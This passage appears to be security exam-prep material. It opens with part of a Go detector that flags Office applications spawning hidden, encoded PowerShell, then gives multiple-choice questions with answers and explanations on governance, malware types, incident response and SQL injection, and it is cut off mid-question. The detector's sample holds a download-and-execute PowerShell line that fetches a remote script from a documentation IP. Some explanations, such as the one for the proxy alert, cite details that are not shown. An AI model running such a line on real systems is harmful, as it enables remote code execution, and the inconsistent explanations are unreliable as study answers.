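func isEncodedFlag(arg string) bool {
	f := strings.ToLower(strings.TrimLeft(arg, "-/"))
	return f != "" && (f == "ec" || strings.HasPrefix("encodedcommand", f))
}

// DecodeEncodedCommand reverses what -EncodedCommand expects: base64 over UTF-16LE text.
func DecodeEncodedCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", fmt.Errorf("odd length %d: not UTF-16LE", len(raw))
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncodeCommand produces the operator-side form; used here only to build the sample event.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// Analyze fires only on an Office parent spawning PowerShell, then pulls out the flags
// the question describes and decodes the payload so the analyst sees the script, not base64.
func Analyze(ev ProcessEvent) (Finding, bool) {
	if !officeApps[baseName(ev.ParentImage)] || !shells[baseName(ev.Image)] {
		return Finding{}, false
	}
	f := Finding{Host: ev.Host, Parent: baseName(ev.ParentImage), Child: baseName(ev.Image)}
	args := strings.Fields(ev.CommandLine)
	for i, a := range args {
		flag := strings.ToLower(strings.TrimLeft(a, "-/"))
		switch {
		case flag == "nop" || flag == "noprofile":
			f.NoProfile = true
		case (flag == "w" || flag == "windowstyle") && i+1 < len(args) && strings.EqualFold(args[i+1], "hidden"):
			f.Hidden = true
		case isEncodedFlag(a) && i+1 < len(args):
			if s, err := DecodeEncodedCommand(args[i+1]); err == nil {
				f.Decoded = s
			}
		}
	}
	return f, true
}

// SampleScript and SampleEvents are constructed; 203.0.113.0/24 is a documentation range.
const SampleScript = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s1')"

var SampleEvents = []ProcessEvent{
	{"WS-0421", `C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`,
		`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -nop -w hidden -enc ` + EncodeCommand(SampleScript)},
	{"WS-0421", `C:\Windows\explorer.exe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
		`powershell.exe -NoProfile -File C:\Scripts\inventory.ps1`}, // an admin's own script: not flagged
}

func main() {
	for _, ev := range SampleEvents {
		if f, ok := Analyze(ev); ok {
			fmt.Printf("%s: %s -> %s (noprofile=%v hidden=%v)\n  runs: %s\n", f.Host, f.Parent, f.Child, f.NoProfile, f.Hidden, f.Decoded)
		}
	}
}
```

The WMI side of the question (finding B) is a separate data source: Sysmon Event IDs 19, 20 and 21 record the filter, consumer and binding that make up a permanent subscription, and Get-CimInstance -Namespace root/subscription -ClassName __EventFilter lists what is already registered on the host.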

464
MCQ · medium

Based on the exhibit, what is the best governance action before the sales team uses the legacy portal without MFA?

A. Update the policy immediately to allow password-only access for all legacy systems.
B. Create a formal time-bound exception with compensating controls, approval, and an expiration date.
C. Have the help desk approve the request informally in the ticket and proceed without further documentation.
D. Ignore the MFA requirement because the portal is owned by a trusted partner.
Answer: B

A formal exception preserves the existing policy while allowing a documented, limited deviation for business need. It should include a risk owner approval, compensating controls such as stricter monitoring or network restrictions, and a review or expiration date so the exception does not become permanent.

Why this answer

Option B is correct because governance requires that any exception to a security policy (such as bypassing MFA) must be formally documented, approved by management, time-bound, and include compensating controls to mitigate risk. In this scenario, the legacy portal lacks MFA support, so a formal exception with an expiration date ensures the risk is tracked and re-evaluated, rather than permanently weakening security posture.

Exam trap

CompTIA often tests the distinction between an informal workaround and a formal governance process, trapping candidates who think a quick approval or policy change is sufficient without understanding the need for documented risk acceptance and compensating controls.

How to eliminate wrong answers

Option A is wrong because immediately updating the policy to allow password-only access for all legacy systems would lower the authentication baseline for every legacy system, not just the one with a documented need, permanently weakening security posture instead of handling the portal through a controlled exception. Option C is wrong because informal help desk approval without documentation bypasses audit trails and accountability, failing to meet governance requirements for risk acceptance and compliance. Option D is wrong because ignoring the MFA requirement simply because the portal is owned by a trusted partner disregards the principle of defense in depth and assumes trust without verification, which is a common security failure.

465
Multi-Select · medium

After a merger, dozens of laptops arrive with inconsistent settings and a history of unsupported utilities installed by the previous owner. The security team wants to establish a known-good configuration, reduce future drift, and accelerate remediation of newly discovered vulnerabilities. Which three actions best support that goal? Select three.

Select 3 answers
A. Build and deploy a secure baseline or gold image for the laptops.
B. Use centralized patch management with staged rollouts and reporting.
C. Enforce configuration management that reapplies approved settings after drift is detected.
D. Allow each user to customize local security settings for productivity.
E. Skip validation after patching because the baseline will always remain correct.
Answers: A, B, C

A secure baseline establishes the approved configuration for the fleet and gives the team a repeatable starting point. A gold image reduces configuration variation from device to device and makes it easier to verify what should be present. It is the most direct way to normalize inherited systems after a merger or acquisition.

Why this answer

A is correct because building and deploying a secure baseline or gold image ensures all laptops start from a known-good configuration, eliminating inconsistencies and unsupported utilities from the previous owner. This directly supports the goal of establishing a trusted state and provides a reference point for detecting future drift.

Exam trap

The trap here is that candidates may think user customization (Option D) is acceptable for productivity, but the scenario explicitly requires a known-good configuration and reduced drift, making any uncontrolled customization counterproductive.

466
Multi-Select · easy

Which two practices help protect encryption keys? Select two.

Select 2 answers
A. Store keys in a hardware security module
B. Rotate keys on a defined schedule
C. Put keys in an unencrypted text file on a server
D. Reuse the same key across many systems forever
E. Send keys through a public chat room
Answers: A, B

An HSM helps protect keys by keeping them isolated from direct exposure.

Why this answer

A hardware security module (HSM) is a dedicated, tamper-resistant hardware device designed to securely generate, store, and manage cryptographic keys. By keeping keys inside the HSM, they never exist in plaintext in system memory or on disk, and operations like signing or decryption occur within the HSM's secure boundary, preventing extraction even if the host is compromised.

Exam trap

The trap here is that candidates may think storing keys in a file with restricted permissions (for example chmod 600) is enough. File permissions help, but they do not survive a root compromise or a backup copied elsewhere; among the listed options, the exam expects the HSM (isolating the key material from the host) and scheduled rotation (limiting how much a leaked key exposes) as the key protection practices.

467
MCQ · easy

After a user installs a free PDF converter from an unofficial website, the laptop starts making periodic outbound connections to an unknown server, the browser homepage changes, and a new program launches at logon. What is the most likely malware type?

A. Worm
B. Trojan
C. Rootkit
D. Ransomware
Answer: B

This is the best answer because the malicious software was disguised as a useful free tool. The symptoms include persistence, browser changes, and communication with an unknown server, which are common signs of a trojan payload. Trojans often arrive through deceptive downloads and then install additional harmful behavior after execution.

Why this answer

The user downloaded and installed a program that appears legitimate (a PDF converter) but performs malicious actions: beaconing to an unknown server, changing browser settings, and adding a startup program. This is the classic behavior of a Trojan horse, which disguises itself as useful software to trick users into installing it, then executes hidden malicious functions. Unlike worms, Trojans do not self-replicate, and unlike ransomware or rootkits, the described symptoms point to periodic outbound contact with a remote server and persistence rather than file encryption or deep OS concealment.

Exam trap

The trap here is that candidates may confuse the self-replicating behavior of a worm with the user-initiated installation of a Trojan, or mistake the visible symptoms (browser change, startup entry) for a rootkit's stealth, when in fact Trojans often exhibit overt persistence mechanisms to maintain access.

How to eliminate wrong answers

Option A is wrong because a worm self-replicates and spreads across networks without user interaction, whereas this infection required the user to manually install a program. Option C is wrong because a rootkit is designed to hide its presence and maintain privileged access by subverting OS-level detection mechanisms, not to change browser homepages or add visible startup entries. Option D is wrong because ransomware typically encrypts files and demands payment, displaying a ransom note, whereas the described symptoms involve outbound connections and browser changes without file encryption or extortion.

468
MCQ · medium

A security analyst in the SOC is reviewing an alert from the corporate VPN server. The alert indicates that user 'jsmith' authenticated successfully from an IP address in Brazil at 14:30 UTC. The analyst contacts jsmith, who confirms he is physically in the company's headquarters in Chicago and has not remotely accessed the VPN today. The VPN authentication logs show that jsmith's session used a valid smart card certificate for authentication. The analyst checks the certificate revocation list and finds that jsmith's certificate has not been revoked. Which of the following is the most likely explanation for this event?

A. The user's smart card and PIN were stolen, allowing an attacker to authenticate from Brazil.
B. An attacker performed a pass-the-hash attack using cached credentials from jsmith's workstation.
C. The VPN server's certificate was forged, allowing the attacker to intercept jsmith's credentials.
D. The user's account password was guessed through a brute-force attack and then used to create a new certificate.
Answer: A

Correct. Smart card authentication requires possession of the physical card and the PIN. If both are stolen, an attacker can impersonate the user.

Why this answer

Option A is correct because the scenario describes a successful VPN authentication using jsmith's valid smart card certificate from a location (Brazil) that the legitimate user denies accessing. Since the certificate was not revoked and the smart card requires both the card and the PIN, the most plausible explanation is that both were stolen, letting an attacker authenticate as jsmith. The user's physical presence in Chicago rules out a legitimate remote session. The CRL result is not reassurance: it only shows that the certificate has not been revoked yet, and a stolen card stays valid until someone reports it. The immediate response is to revoke jsmith's certificate, disable the account, and terminate the session from Brazil.

Exam trap

The trap here is that candidates may assume a valid certificate and successful authentication imply the user is legitimate, overlooking that physical theft of the smart card and PIN allows an attacker to authenticate as the user without any cryptographic anomaly.

How to eliminate wrong answers

Option B is wrong because a pass-the-hash attack replays a cached NTLM password hash, but the VPN session used a smart card certificate (PKI-based authentication), not a password hash, so pass-the-hash does not apply. Option C is wrong because a forged VPN server certificate would enable a man-in-the-middle attack to intercept credentials, but it would not let an attacker authenticate as jsmith with his smart card certificate; the attacker would need the card's private key and PIN, which forging the server certificate does not provide. Option D is wrong because a guessed password yields neither the card nor its non-exportable private key, and obtaining a new certificate would require going through the CA's enrollment process, which would leave its own record and would not produce the certificate already bound to jsmith's card.

469
MCQmedium

EDR alerts on a remote laptop show a suspicious process attempting to dump browser credentials and then contacting a rare domain. The user is in another time zone and still needs the laptop online for a presentation later today. What containment action is best?

A.Remotely isolate the device through the EDR console while keeping it powered on.
B.Ask the user to uninstall the EDR agent and reboot the laptop.
C.Wait until after the presentation and then begin containment.
D.Email the user asking them to close the browser and log out of their accounts.
AnswerA

EDR isolation is the best containment action because it stops most network communication while preserving the device state for investigation. Keeping the endpoint powered on maintains access to volatile evidence and avoids unnecessary disruption to disk contents or running processes. This is especially useful when the user is remote, because it can contain the threat quickly without requiring physical access or a full shutdown that would erase useful forensic data.

Why this answer

Remotely isolating the device through the EDR console is the best containment action because it immediately blocks all network communication to and from the laptop while keeping it powered on and running. This prevents the suspicious process from exfiltrating browser credentials or communicating with the rare command-and-control domain, yet allows the user to continue using local applications for the presentation later today. EDR isolation typically works by applying a host-based firewall rule that drops all traffic except to the EDR management server, ensuring the threat is contained without disrupting local productivity.

Exam trap

The trap here is that candidates may choose to wait until after the presentation (Option C) due to business continuity concerns, failing to recognize that immediate containment via network isolation can preserve both security and productivity.

How to eliminate wrong answers

Option B is wrong because asking the user to uninstall the EDR agent removes the very tool needed to monitor and contain the threat, leaving the laptop defenseless and potentially allowing the malicious process to continue unchecked. Option C is wrong because waiting until after the presentation gives the attacker time to exfiltrate sensitive credentials and establish persistence, violating the fundamental incident response principle of immediate containment. Option D is wrong because emailing the user to close the browser and log out does not stop the suspicious process from running in the background or prevent it from communicating with the rare domain, and the user may not act promptly or correctly.

470
MCQmedium

A finance team receives emails that appear to come from the CEO's assistant and ask them to review a document. Several users entered their passwords on a fake login page, and the attackers then signed in from a new country using the same credentials. Which control most directly reduces successful account takeover if a password is stolen?

A.Require password changes every 30 days for all users.
B.Use phishing-resistant MFA such as FIDO2 or WebAuthn.
C.Turn off all external email to eliminate the chance of future messages.
D.Use single sign-on without MFA so users authenticate only once.
AnswerB

Phishing-resistant multifactor authentication is the strongest choice here because it prevents a stolen password from being enough to log in. The attacker already harvested credentials through a fake login page, so a second factor that cannot be easily replayed from another site directly disrupts the attack path. FIDO2 or WebAuthn reduces the value of captured passwords and helps stop account takeover even when users are deceived by convincing impersonation emails. This is a practical defense against credential phishing and replay.

Why this answer

Phishing-resistant MFA, such as FIDO2 or WebAuthn, directly prevents account takeover even when a password is stolen because these methods use public-key cryptography and origin-bound credentials. The fake login page cannot intercept the private key or replay the authentication, so the attacker cannot sign in from a new country despite having the password.

Exam trap

The trap here is that candidates often choose password rotation (Option A) as a security best practice, but the question specifically asks for the control that most directly reduces successful account takeover when a password is already stolen, which is phishing-resistant MFA, not password aging.

How to eliminate wrong answers

Option A is wrong because requiring password changes every 30 days does not prevent an attacker from using a stolen password immediately; it only reduces the window of exposure after the fact, and frequent changes can actually encourage weaker passwords. Option C is wrong because turning off all external email is an impractical and overly restrictive measure that does not address the core issue of credential theft; attackers could still use other vectors like internal phishing or compromised accounts. Option D is wrong because single sign-on without MFA consolidates authentication to a single point of failure; if the password is stolen, the attacker gains access to all linked systems without additional barriers.

471
Multi-Selecthard

An accounts payable specialist receives an email inside an existing vendor thread that asks for a last-minute bank-account change before a payment run. The wording is professional, the signature matches, and the request is urgent. Which three actions should the specialist take? Select three.

Select 3 answers
A.Verify the request through a known out-of-band contact method for the vendor.
B.Pause the payment and require secondary approval before any bank details are updated.
C.Report the message through the security and vendor-validation process.
D.Reply in the same thread because the address and signature look legitimate.
E.Process the change immediately to avoid delaying the vendor relationship.
AnswersA, B, C

Out-of-band verification breaks the attacker’s control of the compromised email thread and confirms the change independently.

Why this answer

Option A is correct because verifying the request through a known out-of-band contact method (e.g., a phone call to a previously documented vendor number) directly mitigates the risk of business email compromise (BEC). Attackers often hijack or spoof legitimate email threads, so in-band verification (replying within the thread) is unreliable. This aligns with the principle of dual control and independent verification for sensitive financial changes.

Exam trap

The trap here is that candidates assume a professional-looking email with a matching signature is sufficient proof of authenticity, overlooking that BEC attacks can perfectly replicate these details within a compromised thread.

472
MCQmedium

A backup server encrypts large nightly database exports before sending them to an offsite storage system. The organization has already arranged a secure way to share the secret key between the systems, and performance is a concern because the files are very large. Which encryption approach is the best fit?

A.Asymmetric encryption
B.Symmetric encryption
C.Hashing
D.Digital signatures
AnswerB

Symmetric encryption is the best fit for bulk data because it is fast and efficient. When both sides can securely share the same secret key, large backup files can be encrypted and decrypted with much less overhead than with public-key methods. That makes it the standard choice for protecting high-volume data at rest or in transit.

Why this answer

Symmetric encryption (e.g., AES-256) is the best fit because it uses a single shared secret key for both encryption and decryption, offering significantly higher throughput than asymmetric methods. For large files like nightly database exports, symmetric ciphers are hardware-accelerated (e.g., AES-NI) and introduce minimal performance overhead, while the secure key exchange is already handled separately.

Exam trap

The trap here is that candidates often choose asymmetric encryption because they associate it with 'secure key sharing,' forgetting that the scenario explicitly states the key exchange is already handled, so the focus should be on performance for large data volumes.

How to eliminate wrong answers

Option A is wrong because asymmetric encryption (e.g., RSA, ECC) is computationally expensive—typically 100–1000× slower than symmetric encryption—making it impractical for bulk encrypting large files; it is better suited for key exchange or small payloads. Option C is wrong because hashing is a one-way function (e.g., SHA-256) that produces a fixed-size digest and cannot be reversed to recover the original data, so it is used for integrity verification, not confidentiality.

473
MCQmedium

Based on the exhibit, what is the most likely explanation for the alert?

A.The workstation has been redirected to an approved corporate proxy, so the event is expected.
B.A DNS cache poisoning attack is in progress and the workstation is now using a rogue gateway.
C.The endpoint is infected with malware that is hiding its traffic through encrypted tunnels.
D.The workstation is under a denial-of-service attack because it sent repeated DNS lookups.
AnswerA

The exhibit shows the workstation resolving WPAD, retrieving the proxy auto-configuration file, and then sending traffic to the approved proxy listed in inventory. Those steps match normal browser proxy discovery, not malicious behavior. Because the destination is the known corporate proxy, the alert should be validated as legitimate and then tuned if it repeatedly fires on the same approved sequence.

Why this answer

The alert indicates that the workstation's DNS traffic is being redirected to an internal proxy server (10.0.0.53), which is a common configuration in corporate environments for content filtering and security monitoring. Since the destination IP (10.0.0.53) is within the organization's private IP range and the proxy is explicitly approved, this behavior is expected and not malicious. The event is consistent with a transparent proxy or DNS-based proxy redirection, where the workstation's DNS queries are intercepted and forwarded to the corporate proxy.

Exam trap

The trap here is that candidates often assume any DNS redirection to an internal IP indicates a man-in-the-middle attack or DNS poisoning, but they overlook that corporate proxies legitimately use this technique for security monitoring and content filtering.

How to eliminate wrong answers

Option B is wrong because DNS cache poisoning would involve a rogue DNS server returning forged responses, not a consistent redirection to an internal proxy IP; the exhibit shows the workstation's DNS queries going to 10.0.0.53, which is a private IP, not a spoofed external address. Option C is wrong because malware using encrypted tunnels would typically show traffic to an external C2 server over protocols like HTTPS or DNS over HTTPS, not a consistent pattern of DNS queries to a known internal proxy IP. Option D is wrong because a denial-of-service attack would involve an overwhelming volume of traffic or resource exhaustion, not a single workstation sending DNS lookups to a proxy; repeated DNS lookups alone do not indicate a DoS attack.

474
MCQmedium

A security analyst at a manufacturing company notices multiple workstations generating high volumes of encrypted outbound traffic and displaying ransom notes. The analyst suspects a ransomware outbreak. According to the incident response process, which of the following should the analyst perform FIRST?

A.Immediately wipe the hard drives of all affected workstations and reinstall the operating system.
B.Isolate the affected workstations from the network by disconnecting their network cables and disabling Wi-Fi.
C.Contact local law enforcement to report the ransomware incident and request a forensic investigation.
D.Conduct a full forensic analysis of one affected workstation to determine the ransomware variant and entry vector.
AnswerB

This is the correct first step. Rapid containment (isolation) limits the scope of the incident and prevents the ransomware from encrypting additional systems or exfiltrating data.

Why this answer

The first priority in a suspected ransomware outbreak is containment to prevent lateral spread and further encryption. Disconnecting network cables and disabling Wi-Fi immediately isolates the affected workstations from the network, stopping the ransomware from communicating with its command-and-control (C2) server or encrypting additional systems. This aligns with the NIST SP 800-61 incident response lifecycle, where containment precedes eradication and recovery.

Exam trap

The trap here is that candidates often jump to eradication (wiping drives) or notification (calling law enforcement) first, forgetting that containment is the immediate priority to stop the outbreak from spreading across the network.

How to eliminate wrong answers

Option A is wrong because immediately wiping hard drives destroys forensic evidence and prevents analysis of the ransomware variant, infection vector, and scope of compromise, which is critical for understanding and preventing future incidents. Option C is wrong because contacting law enforcement is a notification step that occurs after containment and initial analysis; delaying containment to call authorities allows the ransomware to continue spreading and causing more damage.

475
Multi-Selecthard

A server is suspected of being used for lateral movement after the SOC notices dozens of failed SSH logons, then a successful login from a new source IP, followed by new outbound SMB connections to internal hosts. The system is still running. Which two items should be collected first before any reboot or remediation? Select two.

Select 2 answers
A.A current list of logged-in users and active sessions, because it shows who has access right now.
B.Live network connection information, because it shows current remote targets and suspicious channels.
C.The server’s warranty status, because hardware replacement may be needed later.
D.A fresh operating system patch, because updating quickly reduces all risk.
E.A user satisfaction survey, because affected staff can describe what they noticed.
AnswersA, B

Active session information is volatile and can disappear on reboot. It helps identify whether a legitimate user, compromised account, or attacker shell is currently present on the server. That makes it one of the highest-value items to capture first.

Why this answer

Option A is correct because capturing a current list of logged-in users and active sessions provides immediate visibility into which accounts are currently authenticated and potentially being used by an attacker for lateral movement. This data is volatile and would be lost upon reboot, making it critical to collect before any remediation. In this scenario, the successful SSH login from a new source IP suggests an attacker may have established a foothold, and knowing active sessions helps identify compromised accounts and ongoing access.

Exam trap

The trap here is that candidates may prioritize remediation actions like patching or hardware checks over preserving volatile forensic evidence, failing to recognize that live user sessions and network connections are the most time-sensitive data to collect before any system change.

476
MCQeasy

HR needs to send a benefits contractor a file for testing, but the contractor only needs employee names and plan selections. What is the best action before sharing the file?

A.Send the full file because the contractor is trusted
B.Remove all fields the contractor does not need for the task
C.Post the file to a public collaboration site with a password
D.Rename the file so the contents are harder to identify
AnswerB

Data minimization is the best choice because the contractor should receive only the information required to complete the testing task.

Why this answer

Option B is correct because data minimization is a core security principle: you should only share the minimum necessary data for the task. By removing all fields the contractor does not need (e.g., Social Security numbers, addresses, salary data), you reduce the attack surface and limit exposure of sensitive personally identifiable information (PII) in case of a breach or misuse.

Exam trap

The trap here is that candidates confuse trust with security, assuming a trusted third party eliminates the need for data minimization, when in reality least privilege applies regardless of trust level.

How to eliminate wrong answers

Option A is wrong because trust does not eliminate risk; a trusted contractor could still have a compromised endpoint or accidentally expose the full file, violating the principle of least privilege. Option C is wrong because posting the file to a public collaboration site, even with a password, exposes it to cloud storage risks (e.g., misconfigured permissions, password sharing, or brute-force attacks) and violates data minimization. Option D is wrong because renaming the file does not remove sensitive data; it only obscures the filename, leaving all sensitive fields intact and accessible if the file is opened.

477
MCQmedium

A development team needs to release a security fix to a customer portal, but the change must not introduce a new outage or bypass review controls. Which practice best supports a secure and repeatable release?

A.Apply the change directly in production so users get the fix immediately
B.Use an approved pipeline with peer review, automated testing, and rollback steps
C.Skip testing because security fixes should always be deployed quickly
D.Let any on-call developer approve and deploy without documentation
AnswerB

An approved pipeline with review, testing, and rollback provides controlled delivery while reducing deployment and recovery risk.

Why this answer

Option B is correct because an approved pipeline with peer review, automated testing, and rollback steps ensures that the security fix is deployed in a controlled, repeatable manner. This approach prevents unauthorized changes, validates the fix through testing, and provides a safety net via rollback, directly addressing the requirement to avoid new outages while keeping review controls in place rather than bypassing them.

Exam trap

The trap here is that candidates may confuse 'speed' with 'security' and choose direct production deployment (Option A) or skipping testing (Option C), failing to recognize that a controlled pipeline with rollback is the only way to meet both the security and reliability requirements simultaneously.

How to eliminate wrong answers

Option A is wrong because applying the change directly in production bypasses all review and testing controls, violating the requirement to avoid outages and maintain oversight. Option C is wrong because skipping testing for security fixes increases the risk of introducing new vulnerabilities or breaking functionality, contradicting the need for a secure and repeatable release. Option D is wrong because allowing any on-call developer to approve and deploy without documentation eliminates peer review and traceability, undermining change management and audit requirements.

478
MCQmedium

A development team wants to allow users to search orders by customer name and date range. Logs show the team currently concatenates the filter values into SQL strings. Which change best reduces SQL injection risk without removing the search feature?

A.Escape apostrophes in the input before building the SQL statement.
B.Use parameterized queries or prepared statements for the search filters.
C.Disable database error messages so attackers cannot see query details.
D.Place the application behind a VPN so only internal users can run searches.
AnswerB

Parameterized queries separate code from data, so user input is treated as values rather than executable SQL. This allows the search function to remain flexible while dramatically reducing injection risk. Prepared statements are the preferred fix because they address the root cause instead of relying on brittle string handling.

Why this answer

Option B is correct because parameterized queries (also known as prepared statements) separate SQL logic from user data by sending the query structure and parameters independently to the database. This ensures that user-supplied filter values are always treated as data, never as executable SQL code, which completely prevents SQL injection even if the input contains malicious characters like apostrophes or SQL keywords.

Exam trap

The trap here is that candidates often choose input escaping (Option A) because it seems like a direct fix for the apostrophe problem, but they fail to recognize that parameterized queries are the only comprehensive defense that eliminates the entire class of SQL injection vulnerabilities regardless of input format.

How to eliminate wrong answers

Option A is wrong because escaping apostrophes alone does not protect against all SQL injection vectors, such as numeric fields, stacked queries, or time-based blind injection, and escaping can be bypassed if not done consistently or if the database uses a different escape character. Option C is wrong because disabling database error messages only hides error details from attackers; it does not prevent the injection itself, and an attacker can still exploit the vulnerability using blind SQL injection techniques. Option D is wrong because placing the application behind a VPN does not address the root cause of SQL injection; it only restricts network access, and the vulnerability remains exploitable by any authenticated user who can reach the application.
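The concatenated search described in the question next to its parameterized replacement, as an added example that is not part of the original question bank. It uses Python's built-in sqlite3 module and a constructed in-memory orders table; the unsafe function is kept only for contrast.

```python
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample data (not a real system): an in-memory orders table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, "
        "order_date TEXT, total REAL)"
    )
    conn.executemany(
        "INSERT INTO orders (customer, order_date, total) VALUES (?, ?, ?)",
        [
            ("Alice Smith", "2024-03-01", 120.00),
            ("Bob O'Brien", "2024-03-05", 80.50),
            ("Carol Jones", "2024-04-10", 45.00),
        ],
    )
    return conn


def search_orders_unsafe(conn, customer, start, end):
    """The 'before' pattern from the question: filter values concatenated into
    the SQL text. Deliberately vulnerable; shown only to contrast with the
    hardened version below."""
    sql = (
        "SELECT id, customer, order_date FROM orders WHERE customer = '"
        + customer + "' AND order_date BETWEEN '" + start + "' AND '" + end + "'"
    )
    return conn.execute(sql).fetchall()


def search_orders_safe(conn, customer, start, end):
    """Hardened version: the statement text is fixed and the filter values are
    bound as parameters, so the database never parses them as SQL."""
    sql = (
        "SELECT id, customer, order_date FROM orders "
        "WHERE customer = ? AND order_date BETWEEN ? AND ?"
    )
    return conn.execute(sql, (customer, start, end)).fetchall()


def compare(customer, start, end):
    """Run both variants on the same input and report what each returned.
    A database error from the unsafe variant is reported as a string."""
    conn = build_sample_db()
    try:
        unsafe = search_orders_unsafe(conn, customer, start, end)
    except sqlite3.Error as exc:
        unsafe = f"error: {exc}"
    safe = search_orders_safe(conn, customer, start, end)
    return {"unsafe": unsafe, "safe": safe}


if __name__ == "__main__":
    # A legitimate name containing an apostrophe breaks the concatenated
    # statement (syntax error) while the parameterized query finds the row.
    print(compare("Bob O'Brien", "2024-03-01", "2024-03-31"))
    # A value containing SQL keywords widens the concatenated query to every
    # customer in the date range; the parameterized query treats the same
    # value as a literal customer name that matches nothing.
    print(compare("x' OR '1'='1", "2024-01-01", "2024-12-31"))
```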

479
MCQhard

A finance laptop is opened to review an invoice attachment. EDR then shows winword.exe launching powershell.exe with hidden, no-profile, and base64-encoded arguments. No executable is written to disk, network beacons begin from memory, and after a reboot the activity disappears unless the document is opened again. What type of malware behavior is most likely?

A.Worm behavior, because the infection would self-replicate across systems through the network.
B.Fileless attack, because malicious code runs in memory and leaves little or no executable artifact on disk.
C.Rootkit behavior, because the malware is hidden from normal user-mode tools.
D.Ransomware, because the user opened an invoice attachment before the suspicious activity started.
AnswerB

This is a classic fileless attack pattern. The process chain from a trusted Office app to hidden PowerShell, the encoded command line, the lack of a new binary on disk, and the disappearance after reboot all point to code executing primarily in memory. That makes detection harder and often means the initial document or script acts as the launcher rather than a traditional dropper.

Why this answer

The scenario describes malicious code that executes entirely in memory without writing an executable to disk, which is the defining characteristic of a fileless attack. Winword.exe launching PowerShell with hidden, no-profile, and base64-encoded arguments is a classic technique to load and execute payloads directly in memory, bypassing traditional file-based detection. The fact that activity disappears after reboot unless the document is reopened confirms that no persistent artifact remains on disk, further supporting fileless behavior.

Exam trap

The trap here is that candidates may confuse the initial infection vector (opening an invoice) with the malware type (ransomware), but the key behavioral indicator is the in-memory execution and lack of disk artifacts, which points to fileless malware, not ransomware.

How to eliminate wrong answers

Option A is wrong because worm behavior requires self-replication across systems via network propagation, and there is no evidence of lateral movement or self-copying in this scenario. Option C is wrong because rootkit behavior involves hiding processes, files, or registry keys from the operating system, typically by intercepting system calls, whereas this attack runs in user-mode memory without hiding its presence from EDR. Option D is wrong because ransomware would typically encrypt files and demand payment, but the description only shows beaconing and no file encryption or ransom note, so the invoice attachment is merely the initial vector, not the malware type.
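Detection logic for the process chain in this question (Office parent, PowerShell child with hidden, no-profile and encoded arguments), as an added example that is not part of the original question bank. The events, hostnames and the encoded placeholder script are all constructed; the field names are an assumption, not any particular EDR vendor's schema.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts abbreviated switches (-w, -win, -nop, -e, -enc ...), so
# each pattern matches the switch prefix rather than only the full name.
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)
NOPROFILE_RE = re.compile(r"-nop[a-z]*\b", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(blob):
    """-EncodedCommand carries a UTF-16LE script as base64; surface it for
    triage. Returns None when the blob is not valid base64/UTF-16."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return an alert dict for an Office -> PowerShell chain, else None."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_APPS or child not in SHELLS:
        return None
    cmd = event["command_line"]
    indicators = ["office_parent"]
    if HIDDEN_RE.search(cmd):
        indicators.append("hidden_window")
    if NOPROFILE_RE.search(cmd):
        indicators.append("no_profile")
    decoded = None
    match = ENCODED_RE.search(cmd)
    if match:
        indicators.append("encoded_command")
        decoded = decode_encoded_command(match.group(1))
    # An encoded command line launched from Office is the strongest signal.
    severity = "high" if "encoded_command" in indicators else "medium"
    return {"host": event["host"], "parent": parent, "child": child,
            "indicators": indicators, "severity": severity,
            "decoded_command": decoded}


def detect(events):
    """Run the rule over a batch of process-creation events."""
    return [a for a in (analyze_event(e) for e in events) if a is not None]


# Constructed inner script: a harmless placeholder standing in for a payload.
_PLACEHOLDER = "Write-Output 'stage-two placeholder'"
_ENCODED = base64.b64encode(_PLACEHOLDER.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (hostnames and paths are made up).
SAMPLE_EVENTS = [
    {"host": "FIN-LT-042",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc " + _ENCODED},
    {"host": "OPS-WS-003",  # admin script from Explorer: not an Office parent
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"host": "FIN-LT-042",  # Word spawning the print spooler helper: not a shell
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 12288"},
    {"host": "FIN-LT-017",  # Office -> PowerShell without the evasive switches
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -Command "Get-Date"'},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```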

480
MCQmedium

Security receives a company-owned laptop connected to an insider theft investigation. Before the device is transported to the evidence locker, what is the BEST action to support chain of custody?

A.Factory reset the laptop so investigators can start from a clean system
B.Seal the device in an evidence bag and record each handoff with signatures
